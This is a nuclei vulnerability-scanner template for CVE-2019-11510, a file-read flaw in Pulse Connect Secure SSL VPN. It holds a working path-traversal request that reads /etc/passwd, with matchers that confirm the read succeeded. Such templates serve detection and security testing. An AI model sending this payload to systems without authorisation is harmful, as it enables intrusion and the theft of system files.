nuclei-templates/cves/CVE-2019-11510.yaml

21 lines
530 B
YAML

id: CVE-2019-11510
info:
name: Pulse Connect Secure SSL VPN arbitrary file read vulnerability
author: organiccrap
severity: high
# https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html
requests:
- method: GET
path:
- "{{BaseURL}}/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/"
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"
part: body